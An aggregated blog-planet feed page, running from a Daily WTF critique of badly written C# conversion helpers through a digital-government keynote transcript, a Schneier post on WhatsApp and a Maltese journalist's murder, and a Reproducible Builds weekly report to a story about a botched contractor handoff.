Courtesy of CRANberries, there is also a diffstat report for the this release. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list off the R-Forge page. Issue tickets can be filed at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Worse Than FailureCodeSOD: Lowest-Bidder Conversion

Circa 2003, or so, Annie’s employer contracted a lowest-bidder to produce a relatively massive .NET Web Forms project. The code was built, signed off, and chucked into production without any of the in-house developers being involved, despite being the team that would support it in the long term. There was no documentation, no knowledge transfer, and no code review.

Over the next few years, there was a rush of feature requests as gaps in functionality were found. A series of in-house developers passed through, doing their best to patch them in, but the original project’s code quality didn’t exactly make it maintainable, and since they were operating in a rush, they weren’t exactly improving the code quality.

Fast forward to 2017, and the code is finally unmaintainable enough that someone put together the budget for a ground-up rewrite in .NET MVC, and once again shopped it around to a different lowest-bidder, who would do the conversion. This time, at least, Annie gets to review the code before they accept it. It isn’t going well.

private string AddOne(int DecimalPlace)
{
    string Outpout = ".";
    for (int i = 1; i < DecimalPlace; i++)
    {
        Outpout = Outpout + "0";
    }
    Outpout = Outpout + "1";
    return Outpout;
}

Yes, that’s a stringly-typed operation to create a number in the form “.00001”.

But don’t worry, we can also get the integer value of any string (or any object), nice and easy:

/// <summary>
/// Get Integer Value.
/// </summary>
/// <param name="obj">Object type obj</param>
/// <returns></returns>
public int GetIntegerValue(object obj)
{
    return GetIntegerValue(obj, 0);
}
public int GetIntegerValue(object obj, int defaultReturnValue)
{
    try
    {
        if (obj != null && obj.ToString().Length > 0)
        {
            string objvalue = ClearSpecialChar(Convert.ToString(obj));
            defaultReturnValue = Convert.ToInt32(objvalue);
        }
        //else
        //{
        //    defaultReturnValue = Convert.ToInt32(obj);
        //}
    }
    catch
    {

    }
    return defaultReturnValue;
}

module also needs to handle rounding, and yes, that’s also stringly-typed.

/// <summary>
/// This Methods for round off item weight for(USPS)
/// EX: .15 Pound =1 Pound
/// </summary>
/// <param name="inPutVal"></param>
/// <returns></returns>
public int MakeRoundOffDecimal(string inPutVal)
{
    int contenerVal = 0;
    int intValAfterPoint = 0;

    string ValBeforePoint = inPutVal.Substring(0, inPutVal.IndexOf('.'));
    string valAfterPoint = inPutVal.Substring(inPutVal.IndexOf('.') + 1);

    try
    {
        contenerVal = Convert.ToInt32(ValBeforePoint);
        intValAfterPoint = Convert.ToInt32(valAfterPoint);
        if (intValAfterPoint > 0)
        {
            contenerVal += 1;
        }
    }
    catch
    {
        contenerVal += 1;
    }
    return contenerVal;
}

/// <summary>
/// This Method  Can make decimal value with desiger
/// length with updating last number (if last number after decimel point >=5 then 6 and lessthan <5 then
/// the same value
/// Ex:- 10.012547 will be 10.01255 if i call this method with GetDecimalPlaceValue("10.012547",5)
/// and 12.012351 will be 12.01235 if i cakll this method with GetDecimalPlaceValue("12.012351",5)
/// </summary>
/// <param name="Value"></param>
/// <param name="DecimalPlace"></param>
/// <returns></returns>
public virtual decimal GetDecimalPlaceValue(string Value, int DecimalPlace)
{
    decimal RetunValue = 0.00M;
    int NextToDecimalPlaceValue = 0;
    int DecimalPlaceValue = 0;
    string InputValue = Value;
    try
    {
        RetunValue = Convert.ToDecimal(InputValue.Substring(0, (InputValue.IndexOf('.') + DecimalPlace + 1)));
        NextToDecimalPlaceValue = GetIntegerValue(InputValue.Substring(RetunValue.ToString().Length, 1));
        if (NextToDecimalPlaceValue > 4)
        {
            RetunValue = RetunValue + Convert.ToDecimal(AddOne(DecimalPlace));
        }
    }
    catch
    {
        RetunValue = GetDecimelValue(Value);
    }
    return RetunValue;
}

If you note, the GetDecimalPlaceValue method claims to round (despite not being named anything like it), but will round numbers off incorrectly- the input 1.9 yields 1.

Calls to these various methods are peppered throughout the code base. It appears to be a common utility library that’s simply dropped into every project by this lowest-bidder contractor, and everyone on their team knows to use this for data type conversions.

Annie raised her issues with management, who raised it with their lowest-bidder. Unfortunately, as the lowest-bidder, they’ve already been paid for the first milestone, and are perfectly happy to drag their feet until the code quality issues are forgotten before they bother delivering the second.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianJonathan Dowland: Christmas

Every year, family members ask me to produce a list of gift suggestions for them to buy for me for Christmas. An enviable position for many, I'm sure, but combined with trying to come up with gift ideas for them, this can sometimes be a stressful situation, with a risk of either giving or receiving gifts that are really nothing more than tat, fluff or kipple. I've started to feel that this is detracting from the spirit of the season.

I also don't really want much "stuff". When I am interested in something, it's not something that is convenient for others to buy, either because it's hard to describe, or has limited availability, or is only available at particular times of the year, etc. I'd rather focus on spending time with friends and family.

Starting this year, I'm asking that people who wish to do so donate to a charity on my behalf instead. The charity I have chosen for this year is St. Oswald's Hospice.

Planet Linux AustraliaPia Waugh: FWD50 Keynote: The Tipping Point

I was invited to an incredible and inaugural conference in Canada called FWD50 which was looking at the next 50 days, months and years for society. It had a digital government flavour to it but had participants and content from various international, national and sub-national governments, civil society, academia, industry and advocacy groups. The diversity of voices in the room was good and the organisers committed to greater diversity next year. I gave my keynote as an independent expert and my goal was to get people thinking bigger than websites and mobile apps, to dream about the sort of future we want as a society (as a species!) and work towards that. As part of my talk I also explored what the big paradigm shifts have happened (note the past tense) and potential roles for government (particularly the public sector) in a hyper connected, distributed network of powerful individuals. My slides are available here (simple though they are). It wasn’t recorded but I did an audio recording and transcribed. I was unwell and had lost my voice so this is probably better anyway :)

The tipping point and where do we go from here

I’ve been thinking a lot over many years about change and the difference between iteration and transformation, about systems, about what is going on in the big picture, because what I’m seeing around the world is a lot of people iterating away from pain but not actually iterating towards a future. Looking for ways to solve the current problem but not rethinking or reframing in the current context. I want to talk to you about the tipping point.

We invented all of this. This is worth taking a moment to think. We invented every system, every government, every means of production, we organised ourselves into structures and companies, all the things we know, we invented. By understanding we invented we can embrace the notice we aren’t stuck with it. A lot of people start from the normative perspective that it is how it is and how do we improve it slightly but we don’t have to be constrained to assumption because *we* invented it. We can take a formative approach.

The reason this is important is because the world has fundamentally changed. The world has started from a lot of assumptions. This (slide) is a map of the world as it was known at the time, and it was known for a long time to be flat. And at some point it became known that the world was not flat and people had to change their perspective. If we don’t challenge those assumptions that underpin our systems, we run the significant risk of recreating the past with shiny new things. If we take whatever the shiny thing is today, like blockchain or social media 10 years ago, and take that shiny thing to do what we have always done, then how are we progressing? We are just “lifting and shifting” as they like to say, which as a technologist is almost the worst thing I can hear.

Actually understanding the assumptions that underpin what we do, understanding the goal that we have and what we are trying to achieve, and actually having to make sure that we intentionally choose to move forward with the assumptions that we want to take into the future is important because a lot of the biases and assumptions that underpin the systems that we have today were forged centuries or even millennia ago. A long time before the significant paradigm shifts we have seen.

So I’m going to talk a little bit about how things have changed. It’s not that the tipping point is happening. The tipping point has already happened. We have seen paradigm shifts with legacy systems of power and control. Individuals are more individually powerful than ever in the history of our species. If you think way back in hunter and gatherer times, everyone was individually pretty powerful then, but it didn’t scale. When we moved to cities we actually started to highly specialise and become interdependent and individually less powerful because we made these systems of control that were necessary to manage the surplus of resource, necessary to manage information. But what’s happened now through the independence movements creating a culture of everyone being individually powerful through individual worthy of rights, and then more recently with the internet becoming a distributor, enabler and catalyst of that, we are now seeing power massively distributed.

Think about it. Any individual around the world that can get online, admittedly that’s only two thirds of us but it’s growing every day, and everyone has the power to publish, to create, to share, to collaborate, to collude, to monitor. It’s not just the state monitoring the people but the people monitoring the state and people monitoring other people. There is the power to enforce your own perspective. And it doesn’t actually matter whether you think it’s a good or bad thing, it is the reality. It’s the shift. And if we don’t learn to embrace, understand and participate in it,particularly in government, then we actually make ourselves less relevant. Because one of the main things about this distribution of power, that the internet has taught us fundamentally as part of our culture that we have all started to adopt, is that you can route around damage. The internet was set up to be able to route around damage where damage was physical or technical. We started to internalise that socially and if you, in government, are seen to be damage, then people route around you. This is why we have to learn to work as a node in a network, not just a king in a castle, because kings don’t last anymore.

So which way is forward. The priority now needs to be deciding what sort of future do we want. Not what sort of past do we want to escape. The 21st century sees many communities emerging. They are hyper connected, transnational, multicultural, heavily interdependent, heavily specialised, rapidly changing and disconnected from their geopolitical roots. Some people see that as a reason to move away from having geopolitically formed states. Personally I believe there will always be a role for a geographic state because I need a way to scale a quality of life for my family along with my fellow citizens and neighbours. But what does that mean in an international sense. Are my rights as a human being being realised in a transnational sense. There are some really interesting questions about the needs of users beyond the individual services that we deliver, particularly when you look in a transnational way.

So a lot of these assumptions have become like a rusty anchor that kept us in place in high tide, but are drawing us to a dangerous reef as to water lowers. We need to figure out how to float on the water without rusty anchors to adapt to the tides of change.

There are a lot of pressures that are driving these changes of course. We are all feeling those pressures, those of us that are working in government. There’s the pressure of changing expectations, of history, from politics and the power shift. The pressure of the role of government in the 21st century. Pressure is a wonderful thing as it can be a catalyst of change, so we shouldn’t shy away from pressure, but recognising that we’re under pressure is important.

So let’s explore some of those power shifts and then what role could government play moving forward.

Paradigm #1: central to distributed. This is about that shift in power, the independence movements and the internet. It is something people talk about but don’t necessarily apply to their work. Governments will talk about wanting to take a more distributed approach but followup with setting up “my” website expecting everyone to join or do something. How about everyone come to “my” office or create “my” own lab. Distributed, when you start to really internalise what that means, if different. I was lucky as I forged a lot of my assumptions and habits of working when I was involved in the Open Source community, and the Open Source community has a lot of lessons for rest of society because it is on the bleeding edge of a lot of these paradigm shifts. So working in a distributed way is to assume that you are not at the centre, to assume that you’re not needed. To assume that if you make yourself useful that people will rely on you, but also to assume that you rely on others and to build what you do in a way that strengthens the whole system. I like to talk about it as “Gov as a Platform”, sometimes that is confusing to people so let’s talk about it as “Gov as an enabler”. It’s not just government as a central command and controller anymore because the moment you create a choke point, people route around it. How do we become a government as an enabler of good things, and how can we use other mechanisms to create the controls in society. Rather than try to protect people from themselves, why not enable people to protect themselves. There are so many natural motivations in the community, in industry, in the broader sector that we serve, that we can tap into but traditionally we haven’t. Because traditionally we saw ourselves as the enforcer, as the one to many choke point. So working in a distributed way is not just about talking the talk, it’s about integrated it into the way we think.

Some other aspects of this include localised to globalised, keeping in mind that large multinational companies have become quite good at jurisdiction shopping for improvements of profits, which you can’t say is either a good or bad thing, it’s just a natural thing and how they’re naturally motivated. But citizens are increasingly starting to jurisdiction shop too. So I would suggest a role for government in the 21st century would be to create the best possible quality of life for people, because then you’ll attract the best from around the world.

The second part of central to distributed is simple to complex. I have this curve (on the slide) which shows green as complexity and red as government’s response to user needs. The green climbs exponentially whilst the red is pretty linear, with small increases or decreases over time, but not an exponential response by any means. Individual needs are no longer heavily localised. They are subject to local, national, transnational complexities with every extra complexity compounded, not linear. So the increasing complexities in people’s lives, and the obligations, taxation, services and entitlements, everything is going up. So there is a delta forming between what government can directly do, and what people need. So again I contend that the opportunity here particularly for the public sector is to actually be an enabler for all those service intermediaries – the for profit, non profit, civic tech – to help them help themselves, help them help their customers, by merit of making government a platform upon which they can build. We’ve had a habit and a history of creating public infrastructure, particularly in Australia, in New Zealand, in Canada, we’re been very good at building public infrastructure. Why have we not focused on digital infrastructure? Why do we see digital infrastructure as something that has to be cost recovered to be sustainable when we don’t have to do cost recovery for every thing public road. I think that looking at the cost benefits and value creation of digital public infrastructure needs to be looks at in the same way, and we need to start investing in digital public infrastructure.

Next paradigm shift, analog to digital, or slow to very fast. I like to joke that we use lawyers as modems. If you think about regulation and policy, we write it, it is translated by a lawyer or drafter into regulation or policy, it is then translated by a lawyer or drafter or anyone into operational systems, business systems, helpdesk systems or other systems in society. Why wouldn’t we make our regulation as code? The intent of our regulation and our legislative regimes available to be directly consumed (by the systems) so that we can actually speed up, automate, improve consistency of application through the system, and have a feedback loop to understand whether policy changes are having the intended policy effect.

There are so many great things we can do when we start thinking about digital as something new, not just digitising an analog process. Innovation too long was interpreted as a digitisation of a process, basic process improvements. But real digitisation should a a transformation where you are changing the thing to better achieve the purpose or intent.

The next paradigm is scarcity to surplus. I think this is critical. We have a lot of assumptions in our systems that assume scarcity. Why do we still have so many of our systems assume scarcity when surplus is the opportunity. Between 3D printing and nanotech, we could be deconstructing and reconstructing new materials to print into goods and food and yet a large inhibitor of 3D printing progress is copyright. So the question I have for you is do we care more about an 18h century business model or do we care about solving the problems of our society. We need to make these choices. If we have moved to an era of surplus but we are getting increasing inequality, perhaps the systems of distribution are problematic? Perhaps in assuming scarcity we are protecting scarcity for the few at the cost of the many.

Next paradigm is normative to formative, “please comply”. For the last hundred years in particular we have perfected the art of broadcasting images of normal into our houses, particularly with radio and television. We have the concept of set a standard or rule and if you don’t follow we’ll punish you, so a lot of culture is about compliance in society. Compliance is important for stability, but blind compliance can create millstones. A formative paradigm is about not saying how it is but in exploring where you want to go. In the public service we are particularly good at compliance culture but I suggest that if we got more people thinking formatively, not just change for changes sake, but bringing people together on their genuinely shared purpose of serving the public, then we might be able to take a more formative approach to doing the work we do for the betterment of society rather than ticking the box because it is the process we have to follow. Formative takes us away from being consumers and towards being makers. As an example, the most basic form of normative human behaviour is in how we see and conform to being human. You are either normal, or you are not, based on some externally projected vision of normal. But the internet has shown us that no one is normal. So embracing that it is through our difference we are more powerful and able to adapt is an important part of our story and culture moving forward. If we are confident to be formative, we can always trying to create a better world whilst applying a critical eye to compliance so we don’t comply for compliance sake.

Now on the back of these paradigm shifts, I’d like to briefly about the future. I spoke about the opportunity through surplus with 3D printing and nanotech to address poverty and hunger. What about the opportunities of rockets for domestic travel? It takes half an hour to get into space, an hour to traverse the world and half an hour down which means domestic retail transport by rocket is being developed right now which means I could go from New Zealand to Canada to work for the day and be home for tea. That shift is going to be enormous in so many ways and it could drive real changes in how we see work and internationalism. How many people remember Total Recall? The right hand picture is a self driving car from a movie in the 90s and is becoming normal now. Interesting fact, some of the car designs will tint the windows when they go through intersections because the passengers are deeply uncomfortable with the speed and closeness of self driving cars which can miss each other very narrowly compared to human driving. Obviously there are opportunities around AI, bots and automation but I think where it gets interesting when we think about opportunities of the future of work. We are still working on industrial assumptions that the number of hours that we have is a scarcity paradigm and I have to sell the number of hours that I work, 40, 50, 60 hours. Why wouldn’t we work 20 hours a week at a higher rate to meet our basic needs? Why wouldn’t we have 1 or 2 days a week where we could contribute to our civic duties, or art, or education. Perhaps we could jump start an inclusive renaissance, and I don’t mean cat pictures. People can’t thrive if they’re struggling to survive and yet we keep putting pressure on people just to survive. Again, we are from countries with quite strong safety nets but even those safety nets put huge pressure, paperwork and bureaucracy on our most vulnerable just to meet their basic needs. Often the process of getting access to the services and entitlements is so hard and traumatic that they can’t, so how do we close that gap so all our citizens can move from survival to thriving.

The last picture is a bit cheeky. A science fiction author William Gibson wrote Johnny Pneumonic and has a character in that book called Jones, a cyborg dolphin to sniff our underwater mines in warfare. Very dark, but the interesting concept there is in how Jones was received after the war: “he was more than a dolphin, but from another dolphin’s point of view he might have seemed like something less.” What does it mean to be human? If I lose a leg, right now it is assumed I need to replace that leg to be somehow “whole”. What if I want 4 legs. The human brain is able to adapt to new input. I knew a woman who got a small sphere filled with mercury and a free floating magnet in her finger, and the magnet spins according to frequency and she found over a short period of time she was able to detect changes in frequency. Why is that cool and interesting? Because the brain can adapt to foreign, non evolved input. I think that is mind blowing. We have the opportunity to augment our selves not to just conform to normal or be slightly better, faster humans. But we can actually change what it means to be human altogether. I think this will be one of the next big social challenges for society but because we are naturally so attracted to “shiny”, I think that discomfort will pass within a couple of generations. One prediction is that the normal Olympics has become boring and that we will move into a transhuman olympics where we take the leash off and explore the 100m sprint with rockets, or judo with cyborgs. Where the interest goes, the sponsorship goes, and more professional athletes compete. And what’s going to happen if your child says they want to be a professional transhuman olympian and that they will add wings or remove their legs for their professional career, to add them (or not) later? That’s a bit scary for many but at the same time, it’s very interesting. And it’s ok to be uncomfortable, it’s ok to look at change, be uncomfortable and ask yourself “why am I uncomfortable?” rather than just pushing back on discomfort. It’s critical more than ever, particularly in the public service that we get away from this dualistic good or bad, in or out, yours or mine and start embracing the grey.

So what’s the role of government in all this, in the future. Again these are just some thoughts, a conversation starter.

I think one of our roles is to ensure that individuals have the ability to thrive. Now I acknowledge I’m very privileged to have come from a social libertarian country that believe this, where people broadly believe they want their taxes to go to the betterment of society and not all countries have that assumption. But if we accept the idea that people can’t thrive if they can’t survive, then our baseline quality of life if you assume an individual starts from nothing with no privilege, benefits or family, provided by the state, needs to be good enough for the person to be able to thrive. Otherwise we get a basic structural problem. Part of that is becoming master buildings again, and to go to the Rawl’s example from Alistair before, we need empathy in what we do in government. The amount of times we build systems without empathy and they go terribly wrong because we didn’t think about what it would be like to be on the other side of that service, policy or idea. User centred design is just a systematisation of empathy, which is fantastic, but bringing empathy into everything we do is very important.

Leadership is a very important role for government. I think part of our role is to represent the best interests of society. I very strongly feel that we have a natural role to serve the public in the public sector, as distinct from the political sector (though citizens see us as the same thing). The role of a strong, independent public sector is more important than ever in a post facts “fake news” world because it is one of the only actors on the stage that is naturally motivated, naturally systemically motivated, to serve the best interests of the public. That’s why open government is so important and that’s why digital and open government initiatives align directly.

Because open with digital doesn’t scale, and digital without open doesn’t last.

Stability, predictability and balance. It is certainly a role of government to create confidence in our communities, confidence creates thriving. It is one thing to address Maslov’s pyramid of needs but if you don’t feel confident, if you don’t feel safe, then you still end up behaving in strange and unpredictable ways. So this is part of what is needed for communities to thrive. This relates to regulation and there is a theory that regulation is bad because it is hard. I would suggest that regulation is important for the stability and predictability in society but we have to change the way we deliver it. Regulation as code gets the balance right because you can have the settings and levers in the economy but also the ability for it to be automated, consumable, consistent, monitored and innovative. I imagine a future where I have a personal AI which I can trust because of quantum cryptography and because it is tethered in purpose to my best interests. I don’t have to rely on whether my interests happen to align with the purpose of a department, company or non-profit to get the services I need because my personal bot can figure out what I need and give me the options for me to make decisions about my life. It could deal with the Government AI to figure out the rules, my taxation, obligations, services and entitlements. Where is the website in all that? I ask this because the web was a 1990s paradigm, and we need more people to realise and plan around the idea that the future of service delivery is in building the backend of what we do – the business rules, transactions, data, content, models – in a modular consumable so we can shift channels or modes of delivery whether it is a person, digital service or AI to AI interaction.

Another role of government is in driving the skills we need for the 21st century. Coding is critical not because everyone needs to code (maybe they will) but more than that coding teaches you an assumption, an instinct, that technology is something that can be used by you, not something you are intrinsically bound to. Minecraft is the saviour of a generation because all those kids are growing up believing they can shape the world around them, not have to be shaped by the world around them. This harks back to the normative/formative shift. But we also need to teach critical thinking, teach self awareness, bias awareness, maker skills, community awareness. It has been delightful to move to New Zealand where they have a culture that has an assumed community awareness.

We need of course to have a strong focus on participatory democracy, where government isn’t just doing something to you but we are all building the future we need together. This is how we create a multi-processor world rather than a single processor government. This is how we scale and develop a better society but we need to move beyond “consultation” and into actual co-design with governments working collaboratively across the sectors and with civil society to shape the world.

I’ll finish on this note, government as an enabler, a platform upon which society can build. We need to build a way of working that assumes we are a node in the network, that assumes we have to work collaboratively, that assumes that people are naturally motivated to make good decisions for their life and how can government enable and support people.

So embrace the tipping point, don’t just react. What future do you want, what society do you want to move towards? I guess I’ve got to a point in my life where I see everything as a system and if I can’t connect the dots between what I’m doing and the purpose then I try to not do that thing. The first public service job I had I got in and automated a large proportion of the work within a couple of weeks and then asked for data.gov.au, and they gave it to me because I was motivated to make it better.

So I challenge you to be thinking about this every day, to consider your own assumptions and biases, to consider whether you are being normative or formative, to evaluate whether you are being iterative or transformative, to evaluate whether you are moving away from something or towards something. And to always keep in mind where you want to be, how you are contributing to a better society and to actively leave behind those legacy ideas that simply don’t serve us anymore.

,

LongNowDanny Hillis publishes new essay on Long-Term Timekeeping in the Clock of the Long Now

Danny Hillis, Long Now co-founder and designer of the 10,000 Year Clock, has a new essay, “Long-Term Timekeeping in the Clock of the Long Now” in the book The Science of Time 2016: Time in Astronomy & Society, Past, Present and Future (published November 02017). The Science of Time 2016 presents “information on the science and history of time and its impact on sciences, cultures, religions, and future developments in the field:”

The uses of time in astronomy – from pointing telescopes, coordinating and processing observations, predicting ephemerides, cultures, religious practices, history, businesses, determining Earth orientation, analyzing time-series data and in many other ways – represent a broad sample of how time is used throughout human society and in space. Time and its reciprocal, frequency, is the most accurately measurable quantity and often an important path to the frontiers of science. But the future of timekeeping is changing with the development of optical frequency standards and the resulting challenges of distributing time at ever higher precision, with the possibility of timescales based on pulsars, and with the inclusion of higher-order relativistic effects. The definition of the second will likely be changed before the end of this decade, and its realization will increase in accuracy; the definition of the day is no longer obvious. The variability of the Earth’s rotation presents challenges of understanding and prediction.

In this symposium speakers took a closer look at time in astronomy, other sciences, cultures, and business as a defining element of modern civilization. The symposium aimed to set the stage for future timekeeping standards, infrastructure, and engineering best practices for astronomers and the broader society. At the same time the program was cognizant of the rich history from Harrison’s chronometer to today’s atomic clocks and pulsar observations. The theoreticians and engineers of time were brought together with the educators and historians of science, enriching the understanding of time among both experts and the public.

The book can be purchased here. (Hillis’ individual chapter in the book is also available for purchase.)

Sociological ImagesWhen Home is Where the Hazards Are

Where is your nearest garbage dump? Where does the local factory go when it needs to get rid of some particularly toxic chemicals? If there was a disaster, would you have to move? Could you?

Sociologists use shorthand terms like “environmental racism” to draw attention to the fact that poor communities and communities of color are often more likely to be exposed to hazardous materials, and cases like the Flint water crisis drive this point home.

Of course, housing inequality also means that nobody has to dump anything to put poor communities in hazardous positions. One recent example of this is the flooding in Houston after Hurricane Harvey. Over at Socius, Yuqi Lu gathered data on the median household income in neighborhoods across the Houston area from the American Community Survey and matched it with land elevation data from Google Maps.

In general, poorer neighborhoods in Houston sit at lower elevations, and thus are more susceptible to flood risks. This relationship is strongest in less-densely-populated areas, such as rural and suburban neighborhoods, but additional analysis in Lu’s article shows the relationship is robust.

The latest reports are in on human caused climate change. Regardless of whether we can act to turn it around in time, we’ll also have to recognize the fact that not everyone faces the same fallout from environmental hazards and natural disasters.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

Cory DoctorowHow I lifehacked my way into a corner

My latest Locus column is “How to Do Everything (Lifehacking Considered Harmful),” the story of how I was present at the birth of “lifehacking” and how, by diligently applying the precept that I should always actively choose how I prioritize my time, I have painted my way into a (generally pleasant) corner that I can’t escape from.


Call it the paradox of mindful choosing: after 14 years of throwing away the things that do the least for me and preserving those things that do the most for me, I’ve pulled all the easy blocks out of my life’s Jenga tower, and I’ve left myself with no moves to make.


The past 14 years have regularly featured junctures where I had to get rid of something I liked doing so I could do something I liked doing more. Some of that was low-hanging fruit (I haven’t watched TV regularly in more than a decade), but after getting rid of the empty calories in my activity diet, I had to start making hard choices.

In retrospect, I observe that the biggest predictor of whether an activity surviving winnowing is whether it paid off in two or more of the aspects of my life and career. If something made me a better blogger – but not a bet­ter novelist and activist – it went. The more parts of my life were implicated in an activity, the more likely I was to keep the activity in my daily round.

Some of these choices were tough. I have all but given up on re-reading books, despite the undeniable pleasure and value to understanding the authors’ craft, which is easier to unpick on subsequent readings. But I have more than 20 linear feet of books I’ve promised to read for blurbs and reviews, and reading those books also teaches me something about the craft, also brings me pleasure, also makes me a better reviewer, and also makes me a better citizen of science fiction, who contributes to the success of worthy new books.

Some social media tools – like Facebook – make for fun (if problematic) socializing, and all social media pays some dividend to authors who are hoping to sell books and activists who are hoping to win support, but Twitter also teaches me to be a better writer by making me think about brevity and sentence structure in very rigorous ways (and from an activist perspective, Twitter is a better choice because it, unlike Facebook, doesn’t want the web to die and be replaced by its walled garden) – so Twitter is in, and Facebook is out.

There are some unexpected outcomes from this process, albeit ones that are obvious in hindsight.

How to Do Everything (Lifehacking Considered Harmful) [Cory Doctorow/Locus]

CryptogramDaphne Caruana Galizia's Murder and the Security of WhatsApp

Daphne Caruana Galizia was a Maltese journalist whose anti-corruption investigations exposed powerful people. She was murdered in October by a car bomb.

Galizia used WhatsApp to communicate securely with her sources. Now that she is dead, the Maltese police want to break into her phone or the app, and find out who those sources were.

One journalist reports:

Part of Daphne's destroyed smart phone was elevated from the scene.

Investigators say that Caruana Galizia had not taken her laptop with her on that particular trip. If she had done so, the forensic experts would have found evidence on the ground.

Her mobile phone is also being examined, as can be seen from her WhatsApp profile, which has registered activity since the murder. But it is understood that the data is safe.

Sources close to the newsroom said that as part of the investigation her sim card has been cloned. This is done with the help of mobile service providers in similar cases. Asked if her WhatsApp messages or any other messages that were stored in her phone will be retrieved, the source said that since the messaging application is encrypted, the messages cannot be seen. Therefore it is unlikely that any data can be retrieved.

I am less optimistic than that reporter. The FBI is providing "specific assistance." The article doesn't explain that, but I would not be surprised if they were helping crack the phone.

It will be interesting to see if WhatsApp's security survives this. My guess is that it depends on how much of the phone was recovered from the bombed car.

EDITED TO ADD (11/7): The court-appointed IT expert on the case has a criminal record in the UK for theft and forgery.

Planet DebianReproducible builds folks: Reproducible Builds: Weekly report #132

Here's what happened in the Reproducible Builds effort between Sunday October 29 and Saturday November 4 2017:

Past events

  • From October 31st — November 2nd we held the 3rd Reproducible Builds summit in Berlin, Germany. A full, in-depth report will be posted in the next week or so.

Upcoming events

  • On November 8th Jonathan Bustillos Osornio (jathan) will present at CubaConf Havana.

  • On November 17th Chris Lamb will present at Open Compliance Summit, Yokohama, Japan on how reproducible builds ensures the long-term sustainability of technology infrastructure.

Reproducible work in other projects

Packages reviewed and fixed, and bugs filed

Reviews of unreproducible packages

7 package reviews have been added, 43 have been updated and 47 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (44)
  • Andreas Moog (1)
  • Lucas Nussbaum (7)
  • Steve Langasek (1)

Documentation updates

diffoscope development

Version 88 was uploaded to unstable by Mattia Rizzolo. It included contributions (already covered by posts of the previous weeks) from:

  • Mattia Rizzolo
    • tests/comparators/dtb: compatibility with version 1.4.5. (Closes: #880279)
  • Chris Lamb
    • comparators:
      • binwalk: improve names in output of "internal" members. #877525
      • Omit misleading "any of" prefix when only complaining about one module in ImportError messages.
    • Don't crash on malformed "md5sums" files. (Closes: #877473)
    • tests/comparators:
      • ps: ps2ascii > 9.21 now varies on timezone, so skip this test for now.
      • dtby: only parse the version number, not any "-dirty" suffix.
    • debian/watch: Use HTTPS URI.
  • Ximin Luo
    • comparators:
      • utils/file: Diff container metadata centrally. This fixes a last remaining bug in fuzzy-matching across containers. (Closes: #797759)
      • Fix all the affected comparators after the above change.
  • Holger Levsen
    • Bump Standards-Version to 4.1.1, no changes needed.

strip-nondeterminism development

Version 0.040-1 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks, as well as new ones from:


Version 0.5.2-2 was uploaded to unstable by Holger Levsen.

It included contributions already covered by posts of the previous weeks, as well as new ones from:

reprotest development

buildinfo.debian.net development

tests.reproducible-builds.org

  • Mattia Rizzolo:
    • archlinux: enable schroot building on pb4 as well
    • archlinux: don't install the deprecated abs tool
    • archlinux: try to re-enable one schroot creation job
  • lynxis
    • lede: replace TMPDIR -> RESULTSDIR
    • lede: openwrt_get_banner(): use locals instead of globals
    • lede: add newline to $CONFIG
    • lede: show git log -1 in jenkins log
  • Holger Levsen:
    • lede: add very simple landing page
  • Juliana Oliveira Rodrigues
    • archlinux: adds pacman-git dependencies
  • kpcyrd
    • archlinux: disable signature verification when running in the future
    • archlinux: use pacman-git until the next release
    • archlinux: make pacman fail less early
    • archlinux: use sudo to prepare chroot
    • archlinux: remove -rf for regular file
    • archlinux: avoid possible TOCTOU issue
    • archlinux: Try to fix tar extraction
    • archlinux: fix sha1sums parsing

Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Worse Than FailureReplacement Trainwreck

GreenMountainTrainWreck

There's an old saying about experience in IT: Some people have 10 years of experience, and some have 1 year 10 times. Every day, someone learns the hard way how true this statement really is.

Raquel returned from holiday, only to get a call from above saying her contract would not be renewed, giving her 2 weeks' notice to find a new placement. The boss explained it was a budget thing, since contractors are often more expensive than salaried employees, especially ones working remotely in the Asia-Pacific region. C'est la vie.

Raquel's big project was a perl module to talk to a high-end but aging storage system. The hardware had no API, and the CLI was arcane, with wildly inconsistent formats in the command output. Raquel abstracted that all away to give a programmatic interface for the other developers. The downside of this approach was that every time they put out a firmware update, she had to modify the perl script to match the changes. The module had grown to 1600 lines of code through 400+ commits in the 3 years she'd been working there. The other developers would include this as a git submodule so they could pull in changes in an automated way and re-release their tooling.

Raquel was asked to hand off the module to John, who assured her he knew git really well and enough perl to figure things out. It seemed reasonable ... at first. She got John set up with another, smaller tool she'd written: a plugin for a popular monitoring system to read the storage drives. It used the library she'd written as a backend, so she figured it'd give him some understanding of the functionality. Since some of their customers used Windows, she taught him how to compile to an executable. Once John was compiled and running, Raquel sent him to their lab environment to test the plugin.

A few hours later, she got her first bit of bad news: the plugin was failing, and John didn't know why. He attached the error message:

SSH connection to 192.168.1.10 (22/TCP) failed after 1 attempt(s).

Now, the library used SSH to connect to the drive, so Raquel's first suggestion was to make sure John could SSH into the storage system from the host he was working on. Things went quiet after that, so she figured he'd sorted it out—likely a loose cable or a disabled Ethernet driver—and went on with her day.

The next day, however, she came in to a more urgent message: John was still having problems. She asked for more details, and this was all she got:

SSH connection to 192.168.1.10 (22/TCP) failed after 1 attempt(s).

Maybe he forgot what he was doing? Raquel reminded John about checking the connection, and he replied that he could SSH just fine from the machine.

Weird.... She fired up a WebEx call so she could see what was going on in the lab. Sure enough, John could SSH from that machine to the storage device ... but he was running the plugin on his laptop. He was genuinely puzzled why that mattered.

Over the next half hour, Raquel dug up a network architecture diagram to show how only the lab machines could talk to the lab storage devices. Finally, still confused, John agreed to just do his development on the machines in the lab and they hung up.

